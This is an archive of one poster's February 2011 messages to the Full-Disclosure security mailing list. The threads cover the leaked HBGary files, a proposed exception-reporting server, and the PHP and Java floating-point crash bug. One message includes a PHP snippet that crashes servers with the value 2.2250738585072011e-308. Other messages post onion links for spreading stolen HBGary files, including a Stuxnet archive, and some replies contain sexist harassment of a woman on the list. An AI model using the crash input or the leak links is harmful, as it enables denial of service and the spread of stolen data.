> To: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop
> and Anonymous trackdown
>
> Thought this would be appropriate :-)
>
> http://xkcd.com/149/
>
> On 2/15/2011 4:00 PM, Eyeballing Weev wrote:
> > What do you expect from a woman?
> >
> > Rebecca, kindly make me a sandwich
> >
> > On 02/15/2011 03:44 PM, Cal Leeming [Simplicity Media Ltd] wrote:
> >> I did apologise, no need to drag it out into the yard and beat it
> with a
> >> stick lol.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown

[Cal Leeming [Simplicity Media Ltd]]

http://a1.l3-images.myspacecdn.com/images01/49/3fb5839feabb972e4b40c2807e328396/l.jpg

Rule 34. Now.

On Tue, Feb 15, 2011 at 9:13 PM, Cal Leeming [Simplicity Media Ltd] <
cal.leem...@simplicitymedialtd.co.uk> wrote:

> I now also declare rule 34.
>
> On Tue, Feb 15, 2011 at 9:10 PM, Eyeballing Weev <
> eyeballing.w...@gmail.com> wrote:
>
>> You look really good in heels and a skirt, nice legs also.
>>
>> On 02/15/2011 04:08 PM, Kain, Rebecca (.) wrote:
>> > Of course that's where I got it from.  A woman couldn't be *that*
>> > creative
>> >
>> >
>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown

[Cal Leeming [Simplicity Media Ltd]]

I did apologise, no need to drag it out into the yard and beat it with a
stick lol.

On Tue, Feb 15, 2011 at 8:33 PM, Kain, Rebecca (.)  wrote:

>
>  cool, thanks coderman
>
> If something's a private joke, I don't see why it needed to be aired
> here, that's all.
>
>
> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk
> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of coderman
> Sent: Tuesday, February 15, 2011 3:31 PM
> To: Eyeballing Weev
> Cc: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop
> and Anonymous trackdown
>
> On Tue, Feb 15, 2011 at 7:48 AM, Eyeballing Weev
>  wrote:
> > Wanna hang out later, Rebecca? I got some cocaine, LSD and pills that
> if
> > we get caught I will claim they are not mine and the police planted
> them
> > on us.
>
> poor eyeballer, must be bored silly.  did you leech that correctional
> cctv feed yet?
>
> and beware Rebecca, eyeballer is a selfish and arrogant lover, like
> Assange perhaps. don't be a link to his node on the irc sex chart!
>
> :o
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown

[Cal Leeming [Simplicity Media Ltd]]

Bit of an inside joke, sorry, should have kept it off the list!

On Tue, Feb 15, 2011 at 3:30 PM, Kain, Rebecca (.)  wrote:

>  I haven't understood a word of this so far
>
>
>  --
> *From:* full-disclosure-boun...@lists.grok.org.uk [mailto:
> full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *huj huj huj
> *Sent:* Tuesday, February 15, 2011 10:29 AM
> *To:* Cal Leeming [Simplicity Media Ltd]
> *Cc:* full-disclosure@lists.grok.org.uk
>
> *Subject:* Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop
> and Anonymous trackdown
>
> hey funboys! get a room..
>
> 2011/2/15 Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk>
>
>> Come at me bro :D
>>
>>
>> On Tue, Feb 15, 2011 at 1:29 PM, Benji  wrote:
>>
>>> fighting words.
>>>
>>>
>>> On Tue, Feb 15, 2011 at 1:27 PM, Cal Leeming [Simplicity Media Ltd] <
>>> cal.leem...@simplicitymedialtd.co.uk> wrote:
>>>
>>>> I know right?
>>>>
>>>> First I hold myself back from posting your dox everywhere, and now
>>>> this!
>>>>
>>>>  On Tue, Feb 15, 2011 at 1:06 PM, Benji  wrote:
>>>>
>>>>> Well check you out.
>>>>>
>>>>>
>>>>> On Tue, Feb 15, 2011 at 12:12 PM, Cal Leeming [Simplicity Media Ltd] <
>>>>> cal.leem...@simplicitymedialtd.co.uk> wrote:
>>>>>
>>>>>> Lol, I ain't touching this shit with a barge pole.
>>>>>>
>>>>>> On Mon, Feb 14, 2011 at 11:05 PM,  wrote:
>>>>>>
>>>>>>> HI
>>>>>>>
>>>>>>> i extracted all attachments from the first 3 emails, provided a dump
>>>>>>> of all files categorized by type.
>>>>>>>
>>>>>>> Also you can spread the most significative files on
>>>>>>> anonymous/wikileaks that i selected on the web page.
>>>>>>>
>>>>>>> http://xqz3u5drneuzhaeo.onion/users/hbgary/
>>>>>>>
>>>>>>> It doesn't include attachment from greg emails.
>>>>>>>
>>>>>>> It can be also accessed with:
>>>>>>>
>>>>>>> https://tor-proxy.net/proxy/express/browse.php?u=http%3A%2F%2Fxqz3u5drneuzhaeo.onion%2Fusers%2Fhbgary%2F&b=26
>>>>>>> and
>>>>>>> https://xqz3u5drneuzhaeo.tor2web.org/users/hbgary/
>>>>>>>
>>>>>>> - Digital PSYOP / INFOOPS to influence public media in support to US
>>>>>>> Government
>>>>>>>
>>>>>>> PSYOPS Response.doc
>>>>>>> PPT/PSYOP Process-1.ppt
>>>>>>> PAGES/PSYOPS Response-1.pages
>>>>>>>
>>>>>>> - Anti Anonymous Operations
>>>>>>>
>>>>>>> PDF/Anonymous_v2.pdf with list of operations, name, nicknames
>>>>>>> DOC/Anonymous.docx
>>>>>>>
>>>>>>> - Anti-Wikileaks Operations
>>>>>>> /PPT/WikiLeaks Response v6.pptx
>>>>>>>
>>>>>>> - Analisys of security incidents such as Google Aurora Hacking by
>>>>>>> Chinese Gov,Stuxnes, etc
>>>>>>>
>>>>>>> PDF/HBGThreatReport_Aurora.pdf
>>>>>>> DOC/Aurora_report_v3.docx
>>>>>>> PPT/Aurora Tech Group.ppt
>>>>>>>
>>>>>>> - Stuxnet
>>>>>>> ZIP/stuxnet.zi_
>>>>>>>
>>>>>>> ___
>>>>>>> Full-Disclosure - We believe in it.
>>>>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>>>>
>>>>>>
>>>>>>
>>>>>> ___
>>>>>> Full-Disclosure - We believe in it.
>>>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>>>
>>>>>
>>>>>
>>>>
>>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown

[Cal Leeming [Simplicity Media Ltd]]

Come at me bro :D

On Tue, Feb 15, 2011 at 1:29 PM, Benji  wrote:

> fighting words.
>
>
> On Tue, Feb 15, 2011 at 1:27 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
>
>> I know right?
>>
>> First I hold myself back from posting your dox everywhere, and now this!
>>
>> On Tue, Feb 15, 2011 at 1:06 PM, Benji  wrote:
>>
>>> Well check you out.
>>>
>>>
>>> On Tue, Feb 15, 2011 at 12:12 PM, Cal Leeming [Simplicity Media Ltd] <
>>> cal.leem...@simplicitymedialtd.co.uk> wrote:
>>>
>>>> Lol, I ain't touching this shit with a barge pole.
>>>>
>>>> On Mon, Feb 14, 2011 at 11:05 PM,  wrote:
>>>>
>>>>> HI
>>>>>
>>>>> i extracted all attachments from the first 3 emails, provided a dump of
>>>>> all files categorized by type.
>>>>>
>>>>> Also you can spread the most significative files on anonymous/wikileaks
>>>>> that i selected on the web page.
>>>>>
>>>>> http://xqz3u5drneuzhaeo.onion/users/hbgary/
>>>>>
>>>>> It doesn't include attachment from greg emails.
>>>>>
>>>>> It can be also accessed with:
>>>>>
>>>>> https://tor-proxy.net/proxy/express/browse.php?u=http%3A%2F%2Fxqz3u5drneuzhaeo.onion%2Fusers%2Fhbgary%2F&b=26
>>>>> and
>>>>> https://xqz3u5drneuzhaeo.tor2web.org/users/hbgary/
>>>>>
>>>>> - Digital PSYOP / INFOOPS to influence public media in support to US
>>>>> Government
>>>>>
>>>>> PSYOPS Response.doc
>>>>> PPT/PSYOP Process-1.ppt
>>>>> PAGES/PSYOPS Response-1.pages
>>>>>
>>>>> - Anti Anonymous Operations
>>>>>
>>>>> PDF/Anonymous_v2.pdf with list of operations, name, nicknames
>>>>> DOC/Anonymous.docx
>>>>>
>>>>> - Anti-Wikileaks Operations
>>>>> /PPT/WikiLeaks Response v6.pptx
>>>>>
>>>>> - Analisys of security incidents such as Google Aurora Hacking by
>>>>> Chinese Gov,Stuxnes, etc
>>>>>
>>>>> PDF/HBGThreatReport_Aurora.pdf
>>>>> DOC/Aurora_report_v3.docx
>>>>> PPT/Aurora Tech Group.ppt
>>>>>
>>>>> - Stuxnet
>>>>> ZIP/stuxnet.zi_
>>>>>
>>>>> ___
>>>>> Full-Disclosure - We believe in it.
>>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>>
>>>>
>>>>
>>>> ___
>>>> Full-Disclosure - We believe in it.
>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>
>>>
>>>
>>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown

[Cal Leeming [Simplicity Media Ltd]]

I know right?

First I hold myself back from posting your dox everywhere, and now this!

On Tue, Feb 15, 2011 at 1:06 PM, Benji  wrote:

> Well check you out.
>
>
> On Tue, Feb 15, 2011 at 12:12 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
>
>> Lol, I ain't touching this shit with a barge pole.
>>
>> On Mon, Feb 14, 2011 at 11:05 PM,  wrote:
>>
>>> HI
>>>
>>> i extracted all attachments from the first 3 emails, provided a dump of
>>> all files categorized by type.
>>>
>>> Also you can spread the most significative files on anonymous/wikileaks
>>> that i selected on the web page.
>>>
>>> http://xqz3u5drneuzhaeo.onion/users/hbgary/
>>>
>>> It doesn't include attachment from greg emails.
>>>
>>> It can be also accessed with:
>>>
>>> https://tor-proxy.net/proxy/express/browse.php?u=http%3A%2F%2Fxqz3u5drneuzhaeo.onion%2Fusers%2Fhbgary%2F&b=26
>>> and
>>> https://xqz3u5drneuzhaeo.tor2web.org/users/hbgary/
>>>
>>> - Digital PSYOP / INFOOPS to influence public media in support to US
>>> Government
>>>
>>> PSYOPS Response.doc
>>> PPT/PSYOP Process-1.ppt
>>> PAGES/PSYOPS Response-1.pages
>>>
>>> - Anti Anonymous Operations
>>>
>>> PDF/Anonymous_v2.pdf with list of operations, name, nicknames
>>> DOC/Anonymous.docx
>>>
>>> - Anti-Wikileaks Operations
>>> /PPT/WikiLeaks Response v6.pptx
>>>
>>> - Analisys of security incidents such as Google Aurora Hacking by Chinese
>>> Gov,Stuxnes, etc
>>>
>>> PDF/HBGThreatReport_Aurora.pdf
>>> DOC/Aurora_report_v3.docx
>>> PPT/Aurora Tech Group.ppt
>>>
>>> - Stuxnet
>>> ZIP/stuxnet.zi_
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown

[Cal Leeming [Simplicity Media Ltd]]

Lol, I ain't touching this shit with a barge pole.

On Mon, Feb 14, 2011 at 11:05 PM,  wrote:

> HI
>
> i extracted all attachments from the first 3 emails, provided a dump of all
> files categorized by type.
>
> Also you can spread the most significative files on anonymous/wikileaks
> that i selected on the web page.
>
> http://xqz3u5drneuzhaeo.onion/users/hbgary/
>
> It doesn't include attachment from greg emails.
>
> It can be also accessed with:
>
> https://tor-proxy.net/proxy/express/browse.php?u=http%3A%2F%2Fxqz3u5drneuzhaeo.onion%2Fusers%2Fhbgary%2F&b=26
> and
> https://xqz3u5drneuzhaeo.tor2web.org/users/hbgary/
>
> - Digital PSYOP / INFOOPS to influence public media in support to US
> Government
>
> PSYOPS Response.doc
> PPT/PSYOP Process-1.ppt
> PAGES/PSYOPS Response-1.pages
>
> - Anti Anonymous Operations
>
> PDF/Anonymous_v2.pdf with list of operations, name, nicknames
> DOC/Anonymous.docx
>
> - Anti-Wikileaks Operations
> /PPT/WikiLeaks Response v6.pptx
>
> - Analisys of security incidents such as Google Aurora Hacking by Chinese
> Gov,Stuxnes, etc
>
> PDF/HBGThreatReport_Aurora.pdf
> DOC/Aurora_report_v3.docx
> PPT/Aurora Tech Group.ppt
>
> - Stuxnet
> ZIP/stuxnet.zi_
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] High performance exception/traceback reporting system

[Cal Leeming [Simplicity Media Ltd]]

Oh, having support for XMPP/AMQP would be extremely nice, ideally I'd want
to try and make it compatible with as many different messaging systems as
possible.

On top of this, each supported language would have a library containing
out-of-the-box functions which has every type of messaging/transport option
available. This means the developer can;

   - Choose to use the system out-of-the-box, using the self contained
   messaging system binaries, and simply copy and paste the exception handling
   library / code.

   - Choose to optimize the system by not using the self contained binaries
   (for example, specifying an external database / messaging system to use
   etc).

   - Modify the exception handling code to suit there needs, rather than
   having to write one up from scratch.

As for the fingerprint hashes, this is a really good idea and would make the
reporting aspect very efficient, so I'll be sure to include this.

I'd never heard of SIEM before, after looking on wikipedia I came across
"NitroSecurity" SIEM which sure does look interesting. I'm gonna have a
flick through some of these sites for some inspiration, this may end up
turning in quite a big project!

On Mon, Feb 14, 2011 at 7:54 AM, Daniël W. Crompton <
daniel.cromp...@gmail.com> wrote:

>
> Hi Cal,
>
> I've been thinking of this issue over the weekend and imagined one of the
> solutions to have a messaging system which accepted inputs from different
> languages and transforms these into a report which can be put into a bug
> reporting tool which could use hashes to fingerprint the bugs so you can see
> which are the errors which are causing the most problems.
>
> Sounds like a good plugin for a SIEM too.
>
> D.
>
>
> On 13 February 2011 17:50, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
>
>> Hi,
>>
>> I haven't started development on this yet, I will post the location of the
>> project once I've begun (hopefully next week!)
>>
>> Cal
>>
>>
>> On Sun, Feb 13, 2011 at 4:36 PM, Daniël W. Crompton <
>> daniel.cromp...@gmail.com> wrote:
>>
>>>
>>> Is there any place I can retrieve the code?
>>>
>>> D.
>>>
>>>
>>> On 11 February 2011 18:17, Cal Leeming [Simplicity Media Ltd] <
>>> cal.leem...@simplicitymedialtd.co.uk> wrote:
>>>
>>>> Hey all,
>>>>
>>>> For the last two years, I've been meaning to write a reporting server
>>>> which allows webapps to post their exception tracebacks, which are then
>>>> viewable from a centralized location. After having Thunderbird corrupt my
>>>> mailbox due to over 250 thousand debug emails, this project has now been
>>>> given a bit more priority ;)
>>>>
>>>> The current prototype stores basic exception information (the file path,
>>>> line number, exception type, exception value, originating webapp, node
>>>> hostname etc) in the database, and the traceback details are then
>>>> serialized, dumped into a file, and the path to that file stored against 
>>>> the
>>>> row. A web interface then allows you to browse through these exceptions
>>>> (currently via Django admin), and view them using the same prettified
>>>> exception page which it shows for actual exceptions. This prettified page
>>>> also shows the variables within each frame in the stack, which is very
>>>> handy!
>>>>
>>>> From a developers point of view, this makes life extremely easy, because
>>>> all your webapps report to a single place, you can do sphinx searches,
>>>> alerts, custom reports etc, and it looks pretty lol.
>>>>
>>>> The entire thing is going to be open source, and will eventually be a
>>>> one-click install with a set up page etc.
>>>>
>>>> Here are some of the features I am planning on adding, but if anyone has
>>>> any suggestions as to what they would like to see in this, please feel free
>>>> to mention them!
>>>>
>>>>- Tracebacks can be sent to the server primarily via POST request,
>>>>but custom plugins will allow it to pull in via other means (such as 
>>>> mail
>>>>attachments)
>>>>- Alerts can be given different classifications (for example, you
>>>>could configure specific nodes, webapps, or exception types to alert 
>>>> you via
>>>>BulkSMS)
>>>>- Prettified traceback page should initially support Python/PHP,
>&g

Re: [Full-disclosure] High performance exception/traceback reporting system

[Cal Leeming [Simplicity Media Ltd]]

Hi,

I haven't started development on this yet, I will post the location of the
project once I've begun (hopefully next week!)

Cal

On Sun, Feb 13, 2011 at 4:36 PM, Daniël W. Crompton <
daniel.cromp...@gmail.com> wrote:

>
> Is there any place I can retrieve the code?
>
> D.
>
>
> On 11 February 2011 18:17, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
>
>> Hey all,
>>
>> For the last two years, I've been meaning to write a reporting server
>> which allows webapps to post their exception tracebacks, which are then
>> viewable from a centralized location. After having Thunderbird corrupt my
>> mailbox due to over 250 thousand debug emails, this project has now been
>> given a bit more priority ;)
>>
>> The current prototype stores basic exception information (the file path,
>> line number, exception type, exception value, originating webapp, node
>> hostname etc) in the database, and the traceback details are then
>> serialized, dumped into a file, and the path to that file stored against the
>> row. A web interface then allows you to browse through these exceptions
>> (currently via Django admin), and view them using the same prettified
>> exception page which it shows for actual exceptions. This prettified page
>> also shows the variables within each frame in the stack, which is very
>> handy!
>>
>> From a developers point of view, this makes life extremely easy, because
>> all your webapps report to a single place, you can do sphinx searches,
>> alerts, custom reports etc, and it looks pretty lol.
>>
>> The entire thing is going to be open source, and will eventually be a
>> one-click install with a set up page etc.
>>
>> Here are some of the features I am planning on adding, but if anyone has
>> any suggestions as to what they would like to see in this, please feel free
>> to mention them!
>>
>>- Tracebacks can be sent to the server primarily via POST request, but
>>custom plugins will allow it to pull in via other means (such as mail
>>attachments)
>>- Alerts can be given different classifications (for example, you
>>could configure specific nodes, webapps, or exception types to alert you 
>> via
>>BulkSMS)
>>- Prettified traceback page should initially support Python/PHP, other
>>languages can be added as and when.
>>- Basic authentication / IP restrictions for the admin login
>>- Authentication support for when the tracebacks are POST'd to the
>>server
>>- Tar source should pre-package a lightweight nginx/uwsgi/python
>>environment, so it is self sufficient (this will need to be security
>>maintained obviously).
>>- A nice, pretty, easy to use interface, because this just makes
>>people feel all nice and warm inside ^_^
>>
>> I don't want to go as far as to say that it should be used to collect
>> error_log outputs, I think that would be going a bit too far, the main
>> reason for having a system like this is simply due to the sheer amount of
>> information usually contained within a traceback dump, and the Django
>> prettifier makes it so much easier to debug with!
>>
>> Thoughts/criticisms welcome!
>>
>> Cal
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
>
> --
> blaze your trail
>
> --
> Daniël W. Crompton 
>
> <http://specialbrands.net/>
>
> <http://specialbrands.net/>
> http://specialbrands.net/
> <http://twitter.com/webhat> 
> <http://www.facebook.com/webhat><http://plancast.com/webhat><http://www.linkedin.com/in/redhat>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] High performance exception/traceback reporting system

[Cal Leeming [Simplicity Media Ltd]]

Certainly having support for C++ would be great, but I know sweet FA when it
comes to coding in C/C++, so this may be the perfect time to learn lol.

Your suggestions for having hotlinks back to component information is pretty
hot. On the actual traceback view itself, I'm thinking of having a filter
section at the top which lets you expand/show/hide specific information
(such as frame variables, cast types vs str() wrapped display etc).

I had a look at django-sentry, but it is no where near what I envisaged the
end result to be.

For me, the most important thing is to make this system easily deployable,
self contained, and to have an interface/feature set which focuses on what's
best for a developer, not a manager (possibly in the future, it may have a
'managers' view which lets you see a business impact overview of all the
exceptions etc).

On Fri, Feb 11, 2011 at 7:55 PM, coderman  wrote:

> On Fri, Feb 11, 2011 at 11:51 AM, coderman  wrote:
> > On Fri, Feb 11, 2011 at 9:17 AM, Cal Leeming [Simplicity Media Ltd]
> >  wrote:
> >> ... current prototype stores basic exception information (the file path,
> >> line number, exception type, exception value, originating webapp, node
> >> hostname etc) ...
>
> implicit in my last reply is language agnostic exception reporting, or
> at least c++ support in addition to python/ruby/php/whatever ;)
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] High performance exception/traceback reporting system

[Cal Leeming [Simplicity Media Ltd]]

Hey all,

For the last two years, I've been meaning to write a reporting server which
allows webapps to post their exception tracebacks, which are then viewable
from a centralized location. After having Thunderbird corrupt my mailbox due
to over 250 thousand debug emails, this project has now been given a bit
more priority ;)

The current prototype stores basic exception information (the file path,
line number, exception type, exception value, originating webapp, node
hostname etc) in the database, and the traceback details are then
serialized, dumped into a file, and the path to that file stored against the
row. A web interface then allows you to browse through these exceptions
(currently via Django admin), and view them using the same prettified
exception page which it shows for actual exceptions. This prettified page
also shows the variables within each frame in the stack, which is very
handy!

>From a developers point of view, this makes life extremely easy, because all
your webapps report to a single place, you can do sphinx searches, alerts,
custom reports etc, and it looks pretty lol.

The entire thing is going to be open source, and will eventually be a
one-click install with a set up page etc.

Here are some of the features I am planning on adding, but if anyone has any
suggestions as to what they would like to see in this, please feel free to
mention them!

   - Tracebacks can be sent to the server primarily via POST request, but
   custom plugins will allow it to pull in via other means (such as mail
   attachments)
   - Alerts can be given different classifications (for example, you could
   configure specific nodes, webapps, or exception types to alert you via
   BulkSMS)
   - Prettified traceback page should initially support Python/PHP, other
   languages can be added as and when.
   - Basic authentication / IP restrictions for the admin login
   - Authentication support for when the tracebacks are POST'd to the server
   - Tar source should pre-package a lightweight nginx/uwsgi/python
   environment, so it is self sufficient (this will need to be security
   maintained obviously).
   - A nice, pretty, easy to use interface, because this just makes people
   feel all nice and warm inside ^_^

I don't want to go as far as to say that it should be used to collect
error_log outputs, I think that would be going a bit too far, the main
reason for having a system like this is simply due to the sheer amount of
information usually contained within a traceback dump, and the Django
prettifier makes it so much easier to debug with!

Thoughts/criticisms welcome!

Cal
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

[Cal Leeming [Simplicity Media Ltd]]

Andrew, I'm gonna tell you the same thing my girl tells me when I'm being
a cunt. You need a fucking slap. lol.

On Thu, Feb 10, 2011 at 5:39 PM, Christian Sciberras wrote:

> One question. Who's "you" that you keep referring to all the time?
>
>
>
>
> On Thu, Feb 10, 2011 at 5:44 PM, andrew.wallace <
> andrew.wall...@rocketmail.com> wrote:
>
>> Thankfully you are very rarely involved with public and private sector
>> business talks in the UK, so the situation will probably never arise we are
>> in the same board room.
>>
>> Stay in America and keep away from the UK is the best thing that could
>> ever happen to you, because frankly meeting you would be a complete
>> nightmare for me and I would find it hard to work with you on any meaningful
>> level.
>>
>> One thing for sure is you have pissed me off with the way you speak to me
>> via private email and your perceived perception of who I am, and what you
>> think n3td3v is.
>>
>> Maybe in the beginning it seemed like disorganised non-sense to you, but
>> it has evolved and shaped over the years with me and is now a serious force
>> to be reckoned with and is able to compete with other consultancy
>> orgainsations in the UK, now that there are serious consultants on board
>> from the business and government sector in the UK, where we work on
>> meaningful policy reform within organisations, to tighten security against
>> foreign powers, terrorist attacks and other matters.
>>
>> To be perfectly honest, I would like to say, I think you've been reading
>> mailing lists too much, a lot more goes on in industry than the stupid
>> disclosure community, work actually gets done that is meaningful and
>> satisfying when I come home at night.
>>
>> My advice to you is, stop reading mailing lists, get on with the physical
>> industry and stop basing your views of people based on back and forward
>> horse play people have have had between 2004-2009.
>>
>> That part of n3td3v is behind you, me and everyone, I removed the mailing
>> list as a symbolic gesture to move on from that.
>>
>> I'm now a professional, consulting and liaising with other consultants in
>> the UK in the public and private sector through the consortium, the
>> consultants who ive had dealings with in the physical domain who have
>> decided to join through knowing me in a working relationship.
>>
>> The organisation is nothing to do with what it might have been, n3td3v is
>> rethought and matured, along with me.
>>
>> You couldn't possibly say the same orgainsation I started when I was 18 is
>> going to be the same orgainsation today now that I'm 30, it isn't.
>>
>> I've changed, we've changed, the type of people I come into contact has
>> changed through opportunities I've gained in the physical domain.
>>
>> n3td3v is very much nothing to do with anything online-based, but has
>> shifted into the physical domain, in that, its people I actually know who I
>> can shake hands with who are members.
>>
>> That is why the name was changed, the brand, its now a consortium, its
>> nothing to do with online or some silly Google group mailing list.
>>
>> The beginning days of n3td3v between 2004-2009 and the Google group
>> mailing list was used to push my name out into the industry to become known,
>> you should be able to work with me in a meaningful working relationship if
>> you ever had to through work commitments.
>>
>>
>> Everyone else who I meet in the physical domain knows who I am, but they
>> don't judge me for it, they shake my hand and move on with the problems in
>> the industry that are needing solved.
>>
>> They don't say, that's Andrew who used to post in the disclosure
>> community, let's huff and puff about it.
>>
>> They take me as I am in the physical domain, realise it was silly horse
>> play from the past and move on.
>>
>> I hope you are able to do the same, because your attitude just annoys me
>> that you cannot have a mature and professional approach in the way you talk
>> with me.
>>
>> Andrew
>>
>>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] {Java,PHP} Server Exploits

[Cal Leeming [Simplicity Media Ltd]]

Christian, this issue has been 'floating' around for several months now.

On Wed, Feb 9, 2011 at 7:56 PM, Christian Sciberras wrote:

> Ah, been reading more about it, seems it was fixed.
>
> Still, there should have been safeguards around this - I'm thinking they
> should check existing conversion routines to ensure they're safe...
>
>
>
>
> On Wed, Feb 9, 2011 at 8:54 PM, Christian Sciberras wrote:
>
>> Was it fixed? What's the current status?
>>
>> The sounds like a major issue, and the lack of info about it is darn
>> impressive.
>>
>>
>> I tried it on my test Windows WAMP server:
>>
>> >
>> ob_implicit_flush(true);
>>
>> echo 'Start test...';
>>
>> $f=(float)"2.2250738585072011e-308";
>> echo 'Try 1 => '.$f.'';
>>
>> $f=floatval("2.2250738585072011e-308");
>> echo 'Try 2 => '.$f.'';
>>
>> $f="2.2250738585072011e-308";
>> echo 'Try 3 => '.(float)$f.'';
>>
>> echo 'Test failed, server not vulnerable!';
>>
>> ?>
>>
>> All three tests succeeded in crashing the server.
>>
>> With all due respect, this should NOT have been disclosed without being
>> FIXED (as it seems to me).
>> Plus, I'm a bit amazed such a bug exists in PHP - since converting to
>> floating point is a trivial operation, it should have been limited and
>> safe-guarded from the start.
>> There are a lot of servers out there happily accepting input as floating
>> point values, this bug should be top priority...
>>
>>
>> Chris.
>>
>>
>>
>> On Wed, Feb 9, 2011 at 6:40 PM, Leon Kaiser  wrote:
>>
>>>
>>> http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers
>>>
>>> http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server
>>>
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Mr. Lemming

[Cal Leeming [Simplicity Media Ltd]]

Andrew, go fuck yourself :)

On Wed, Feb 9, 2011 at 2:12 AM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Tue, Feb 8, 2011 at 2:55 PM,   wrote:
